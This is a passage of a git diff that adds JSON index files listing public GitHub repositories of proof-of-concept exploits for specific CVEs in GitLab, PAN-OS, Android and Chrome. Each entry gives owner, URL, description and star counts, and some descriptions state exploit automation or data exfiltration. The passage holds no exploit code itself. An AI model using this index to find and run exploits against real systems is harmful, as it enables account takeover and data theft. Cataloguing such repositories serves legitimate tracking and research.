"2024-01-18T10:13:18Z", + "updated_at": "2024-01-24T01:41:36Z", + "pushed_at": "2024-01-18T10:31:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747135442, + "name": "CVE-2023-7028-Account-Take-Over-Gitlab", + "full_name": "Shimon03\/CVE-2023-7028-Account-Take-Over-Gitlab", + "owner": { + "login": "Shimon03", + "id": 78235187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78235187?v=4", + "html_url": "https:\/\/github.com\/Shimon03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shimon03\/CVE-2023-7028-Account-Take-Over-Gitlab", + "description": null, + "fork": false, + "created_at": "2024-01-23T10:37:07Z", + "updated_at": "2024-01-23T11:01:04Z", + "pushed_at": "2024-01-23T11:00:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747356855, + "name": "CVE-2023-7028", + "full_name": "thanhlam-attt\/CVE-2023-7028", + "owner": { + "login": "thanhlam-attt", + "id": 79523444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4", + "html_url": "https:\/\/github.com\/thanhlam-attt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-7028", + "description": null, + "fork": false, + "created_at": "2024-01-23T19:11:11Z", + "updated_at": "2024-05-05T02:05:02Z", + "pushed_at": "2024-01-23T19:22:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748113457, + "name": "CVE-2023-7028-Docker", + "full_name": "Trackflaw\/CVE-2023-7028-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-7028-Docker", + "description": "Repository to install CVE-2023-7028 vulnerable Gitlab instance", + "fork": false, + "created_at": "2024-01-25T09:56:00Z", + "updated_at": "2024-12-20T10:17:56Z", + "pushed_at": "2024-01-25T10:18:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748516354, + "name": "CVE-2023-7028", + "full_name": "mochammadrafi\/CVE-2023-7028", + "owner": { + "login": "mochammadrafi", + "id": 73122628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73122628?v=4", + "html_url": "https:\/\/github.com\/mochammadrafi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mochammadrafi\/CVE-2023-7028", + "description": "Python Code for Exploit Automation CVE-2023-7028", + "fork": false, + "created_at": "2024-01-26T06:29:34Z", + "updated_at": "2024-01-26T06:32:54Z", + "pushed_at": "2024-01-26T06:32:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749490677, + "name": "gitlab-exploit", + "full_name": "hackeremmen\/gitlab-exploit", + "owner": { + "login": "hackeremmen", + "id": 97889952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97889952?v=4", + "html_url": "https:\/\/github.com\/hackeremmen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackeremmen\/gitlab-exploit", + "description": "GitLab CVE-2023-7028", + "fork": false, + "created_at": "2024-01-28T18:23:31Z", + "updated_at": "2024-01-29T03:26:47Z", + "pushed_at": "2024-01-28T18:24:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833605581, + "name": "CVE-2023-7028", + "full_name": "soltanali0\/CVE-2023-7028", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2023-7028", + "description": "Implementation and exploitation of CVE-2023-7028 account takeover vulnerability related to GO-TO CVE weekly articles of the 11th week.", + "fork": false, + "created_at": "2024-07-25T11:39:01Z", + "updated_at": "2024-07-25T12:26:04Z", + "pushed_at": "2024-07-25T12:25:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845342869, + "name": "CVE-2023-7028", + "full_name": "gh-ost00\/CVE-2023-7028", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2023-7028", + "description": "CVE-2023-7028 POC && Exploit", + "fork": false, + "created_at": "2024-08-21T04:14:55Z", + "updated_at": "2024-12-21T06:40:31Z", + "pushed_at": "2024-08-21T04:16:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7172.json b/2023/CVE-2023-7172.json new file mode 100644 index 0000000000..fd6290496c --- /dev/null +++ b/2023/CVE-2023-7172.json @@ -0,0 +1,33 @@ +[ + { + "id": 738005679, + "name": "CVE-2023-7172", + "full_name": "sharathc213\/CVE-2023-7172", + "owner": { + "login": "sharathc213", + "id": 63504490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63504490?v=4", + "html_url": "https:\/\/github.com\/sharathc213", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharathc213\/CVE-2023-7172", + "description": null, + "fork": false, + "created_at": "2024-01-02T07:28:25Z", + "updated_at": "2024-09-07T10:22:34Z", + "pushed_at": "2024-01-02T08:01:27Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7173.json b/2023/CVE-2023-7173.json new file mode 100644 index 0000000000..3820055136 --- /dev/null +++ b/2023/CVE-2023-7173.json @@ -0,0 +1,33 @@ +[ + { + "id": 738027789, + "name": "CVE-2023-7173", + "full_name": "sharathc213\/CVE-2023-7173", + "owner": { + "login": "sharathc213", + "id": 63504490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63504490?v=4", + "html_url": "https:\/\/github.com\/sharathc213", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharathc213\/CVE-2023-7173", + "description": null, + "fork": false, + "created_at": "2024-01-02T08:41:10Z", + "updated_at": "2024-09-07T10:22:32Z", + "pushed_at": "2024-01-02T08:55:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7261.json b/2023/CVE-2023-7261.json new file mode 100644 index 0000000000..e0aed763d2 --- /dev/null +++ b/2023/CVE-2023-7261.json @@ -0,0 +1,33 @@ +[ + { + "id": 888744283, + "name": "CVE-2023-7261", + "full_name": "zerozenxlabs\/CVE-2023-7261", + "owner": { + "login": "zerozenxlabs", + "id": 18348468, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18348468?v=4", + "html_url": "https:\/\/github.com\/zerozenxlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zerozenxlabs\/CVE-2023-7261", + "description": "Google Chrome Updater DosDevices Local Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2024-11-14T23:41:32Z", + "updated_at": "2024-11-26T14:47:04Z", + "pushed_at": "2024-11-14T23:55:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0012.json b/2024/CVE-2024-0012.json new file mode 100644 index 0000000000..d1118ac481 --- /dev/null +++ b/2024/CVE-2024-0012.json @@ -0,0 +1,286 @@ +[ + { + "id": 890817341, + "name": "palo-alto-panos-cve-2024-0012", + "full_name": "watchtowrlabs\/palo-alto-panos-cve-2024-0012", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/palo-alto-panos-cve-2024-0012", + "description": null, + "fork": false, + "created_at": "2024-11-19T08:29:32Z", + "updated_at": "2025-01-02T13:11:27Z", + "pushed_at": "2024-11-19T09:28:42Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890899855, + "name": "CVE-2024-0012-POC", + "full_name": "Sachinart\/CVE-2024-0012-POC", + "owner": { + "login": "Sachinart", + "id": 18497191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18497191?v=4", + "html_url": "https:\/\/github.com\/Sachinart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sachinart\/CVE-2024-0012-POC", + "description": "CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) RCE POC", + "fork": false, + "created_at": "2024-11-19T11:30:25Z", + "updated_at": "2024-12-05T00:53:26Z", + "pushed_at": "2024-11-19T11:37:09Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891583314, + "name": "CVE-2024-0012", + "full_name": "greaselovely\/CVE-2024-0012", + "owner": { + "login": "greaselovely", + "id": 71092239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71092239?v=4", + "html_url": "https:\/\/github.com\/greaselovely", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greaselovely\/CVE-2024-0012", + "description": "PANW NGFW CVE-2024-0012", + "fork": false, + "created_at": "2024-11-20T15:35:29Z", + "updated_at": "2024-11-22T20:10:24Z", + "pushed_at": "2024-11-22T20:10:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891832016, + "name": "CVE-2024-0012", + "full_name": "VegetableLasagne\/CVE-2024-0012", + "owner": { + "login": "VegetableLasagne", + "id": 118773543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118773543?v=4", + "html_url": "https:\/\/github.com\/VegetableLasagne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VegetableLasagne\/CVE-2024-0012", + "description": "Palo Alto CVE-2024-0012 Exploit POC", + "fork": false, + "created_at": "2024-11-21T03:08:00Z", + "updated_at": "2024-11-21T03:08:47Z", + "pushed_at": "2024-11-21T03:08:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892487345, + "name": "CVE-2024-0012-poc", + "full_name": "iSee857\/CVE-2024-0012-poc", + "owner": { + "login": "iSee857", + "id": 73977770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73977770?v=4", + "html_url": "https:\/\/github.com\/iSee857", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iSee857\/CVE-2024-0012-poc", + "description": "CVE-2024-0012批量检测脚本", + "fork": false, + "created_at": "2024-11-22T07:52:11Z", + "updated_at": "2024-11-26T07:38:23Z", + "pushed_at": "2024-11-26T07:38:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892650578, + "name": "cve-2024-0012-poc", + "full_name": "XiaomingX\/cve-2024-0012-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-0012-poc", + "description": "CVE-2024-0012是Palo Alto Networks PAN-OS软件中的一个身份验证绕过漏洞。该漏洞允许未经身份验证的攻击者通过网络访问管理Web界面,获取PAN-OS管理员权限,从而执行管理操作、篡改配置,或利用其他需要身份验证的特权提升漏洞(如CVE-2024-9474) ", + "fork": false, + "created_at": "2024-11-22T14:11:56Z", + "updated_at": "2024-12-08T18:37:20Z", + "pushed_at": "2024-11-22T14:37:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892819901, + "name": "Paloalto-CVE-2024-0012", + "full_name": "punitdarji\/Paloalto-CVE-2024-0012", + "owner": { + "login": "punitdarji", + "id": 38101321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38101321?v=4", + "html_url": "https:\/\/github.com\/punitdarji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/punitdarji\/Paloalto-CVE-2024-0012", + "description": null, + "fork": false, + "created_at": "2024-11-22T20:58:17Z", + "updated_at": "2024-11-22T21:00:08Z", + "pushed_at": "2024-11-22T21:00:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896532665, + "name": "CVE-2024-0012", + "full_name": "0xjessie21\/CVE-2024-0012", + "owner": { + "login": "0xjessie21", + "id": 2928054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2928054?v=4", + "html_url": "https:\/\/github.com\/0xjessie21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xjessie21\/CVE-2024-0012", + "description": "CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) RCE POC", + "fork": false, + "created_at": "2024-11-30T16:06:02Z", + "updated_at": "2024-12-02T02:33:44Z", + "pushed_at": "2024-12-02T02:33:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-0012", + "exploit", + "paloaltonetworks" + ], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 902007048, + "name": "CVE-2024-0012_CVE-2024-9474_PoC", + "full_name": "TalatumLabs\/CVE-2024-0012_CVE-2024-9474_PoC", + "owner": { + "login": "TalatumLabs", + "id": 191394406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/191394406?v=4", + "html_url": "https:\/\/github.com\/TalatumLabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TalatumLabs\/CVE-2024-0012_CVE-2024-9474_PoC", + "description": "This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script automates the exploitation process, including payload creation, chunked delivery, and seamless command execution.", + "fork": false, + "created_at": "2024-12-11T18:13:32Z", + "updated_at": "2024-12-14T02:34:33Z", + "pushed_at": "2024-12-12T15:48:10Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0015.json b/2024/CVE-2024-0015.json new file mode 100644 index 0000000000..89385950a8 --- /dev/null +++ b/2024/CVE-2024-0015.json @@ -0,0 +1,33 @@ +[ + { + "id": 774300309, + "name": "CVE-2024-0015", + "full_name": "UmVfX1BvaW50\/CVE-2024-0015", + "owner": { + "login": "UmVfX1BvaW50", + "id": 145543095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145543095?v=4", + "html_url": "https:\/\/github.com\/UmVfX1BvaW50", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UmVfX1BvaW50\/CVE-2024-0015", + "description": "a demo poc for CVE-2024-0015", + "fork": false, + "created_at": "2024-03-19T10:00:21Z", + "updated_at": "2024-12-06T06:50:42Z", + "pushed_at": "2024-08-14T09:53:13Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0023.json b/2024/CVE-2024-0023.json new file mode 100644 index 0000000000..685e63f00c --- /dev/null +++ b/2024/CVE-2024-0023.json @@ -0,0 +1,64 @@ +[ + { + "id": 835151018, + "name": "G3_Frameworks_av_CVE-2024-0023", + "full_name": "AbrarKhan\/G3_Frameworks_av_CVE-2024-0023", + "owner": { + "login": "AbrarKhan", + "id": 3054615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054615?v=4", + "html_url": "https:\/\/github.com\/AbrarKhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbrarKhan\/G3_Frameworks_av_CVE-2024-0023", + "description": null, + "fork": false, + "created_at": "2024-07-29T09:06:34Z", + "updated_at": "2024-07-29T10:47:59Z", + "pushed_at": "2024-07-29T10:48:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851627563, + "name": "frameworks_av_android10_r33_CVE-2024-0023", + "full_name": "Aakashmom\/frameworks_av_android10_r33_CVE-2024-0023", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/frameworks_av_android10_r33_CVE-2024-0023", + "description": null, + "fork": false, + "created_at": "2024-09-03T12:47:32Z", + "updated_at": "2024-09-03T12:50:57Z", + "pushed_at": "2024-09-03T12:50:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0030.json b/2024/CVE-2024-0030.json new file mode 100644 index 0000000000..e1185bcbf1 --- /dev/null +++ b/2024/CVE-2024-0030.json @@ -0,0 +1,33 @@ +[ + { + "id": 840219760, + "name": "system_bt_CVE-2024-0030", + "full_name": "uthrasri\/system_bt_CVE-2024-0030", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/system_bt_CVE-2024-0030", + "description": null, + "fork": false, + "created_at": "2024-08-09T08:17:31Z", + "updated_at": "2024-08-09T08:54:42Z", + "pushed_at": "2024-08-09T08:18:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0039.json b/2024/CVE-2024-0039.json new file mode 100644 index 0000000000..f8a9a1f911 --- /dev/null +++ b/2024/CVE-2024-0039.json @@ -0,0 +1,43 @@ +[ + { + "id": 807845235, + "name": "CVE-2024-0039-Exploit", + "full_name": "41yn14\/CVE-2024-0039-Exploit", + "owner": { + "login": "41yn14", + "id": 55758408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55758408?v=4", + "html_url": "https:\/\/github.com\/41yn14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/41yn14\/CVE-2024-0039-Exploit", + "description": "Эксплойт для уязвимости CVE-2024-0039 на Android, который позволяет выполнять произвольный код через MP4 файл. Этот репозиторий создан для образовательных целей.", + "fork": false, + "created_at": "2024-05-29T22:13:04Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-29T22:17:39Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve", + "ethical-hacking", + "exploit", + "mp4", + "python", + "remote-code-execution", + "security", + "security-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0040.json b/2024/CVE-2024-0040.json new file mode 100644 index 0000000000..ae8819cfc5 --- /dev/null +++ b/2024/CVE-2024-0040.json @@ -0,0 +1,64 @@ +[ + { + "id": 835214655, + "name": "frameworks_av_AOSP10_r33_CVE-2024-0040", + "full_name": "nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0040", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0040", + "description": null, + "fork": false, + "created_at": "2024-07-29T11:45:41Z", + "updated_at": "2024-07-29T11:48:59Z", + "pushed_at": "2024-07-29T11:48:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838678998, + "name": "frameworks_av_CVE-2024-0040", + "full_name": "uthrasri\/frameworks_av_CVE-2024-0040", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/frameworks_av_CVE-2024-0040", + "description": null, + "fork": false, + "created_at": "2024-08-06T06:13:59Z", + "updated_at": "2024-08-08T06:18:28Z", + "pushed_at": "2024-08-08T06:18:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0044.json b/2024/CVE-2024-0044.json new file mode 100644 index 0000000000..a95796ff26 --- /dev/null +++ b/2024/CVE-2024-0044.json @@ -0,0 +1,347 @@ +[ + { + "id": 816719987, + "name": "android_autorooter", + "full_name": "scs-labrat\/android_autorooter", + "owner": { + "login": "scs-labrat", + "id": 102700300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102700300?v=4", + "html_url": "https:\/\/github.com\/scs-labrat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scs-labrat\/android_autorooter", + "description": "Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability remotely", + "fork": false, + "created_at": "2024-06-18T09:22:59Z", + "updated_at": "2024-12-21T23:23:26Z", + "pushed_at": "2024-07-31T01:29:36Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 64, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 816799428, + "name": "CVE-2024-0044", + "full_name": "0xbinder\/CVE-2024-0044", + "owner": { + "login": "0xbinder", + "id": 62325297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62325297?v=4", + "html_url": "https:\/\/github.com\/0xbinder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xbinder\/CVE-2024-0044", + "description": "CVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13", + "fork": false, + "created_at": "2024-06-18T12:30:53Z", + "updated_at": "2025-01-07T03:25:37Z", + "pushed_at": "2024-12-02T06:29:52Z", + "stargazers_count": 273, + "watchers_count": 273, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 273, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 823594837, + "name": "CVE-2024-0044-EXP", + "full_name": "Re13orn\/CVE-2024-0044-EXP", + "owner": { + "login": "Re13orn", + "id": 29865055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29865055?v=4", + "html_url": "https:\/\/github.com\/Re13orn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Re13orn\/CVE-2024-0044-EXP", + "description": "利用 CVE-2024-0044 Android 权限提升下载任意目标App沙箱文件。", + "fork": false, + "created_at": "2024-07-03T10:29:06Z", + "updated_at": "2024-12-21T23:23:35Z", + "pushed_at": "2024-09-03T09:31:58Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827491098, + "name": "c-CVE-2024-0044", + "full_name": "007CRIPTOGRAFIA\/c-CVE-2024-0044", + "owner": { + "login": "007CRIPTOGRAFIA", + "id": 122584002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122584002?v=4", + "html_url": "https:\/\/github.com\/007CRIPTOGRAFIA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/007CRIPTOGRAFIA\/c-CVE-2024-0044", + "description": "CVE-2024-0044: uma vulnerabilidade de alta gravidade do tipo \"executar como qualquer aplicativo\" que afeta as versões 12 e 13 do Android", + "fork": false, + "created_at": "2024-07-11T18:46:45Z", + "updated_at": "2024-12-21T23:23:38Z", + "pushed_at": "2024-07-11T18:51:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828846934, + "name": "CVE-2024-0044-EXP", + "full_name": "Kai2er\/CVE-2024-0044-EXP", + "owner": { + "login": "Kai2er", + "id": 40434718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40434718?v=4", + "html_url": "https:\/\/github.com\/Kai2er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kai2er\/CVE-2024-0044-EXP", + "description": 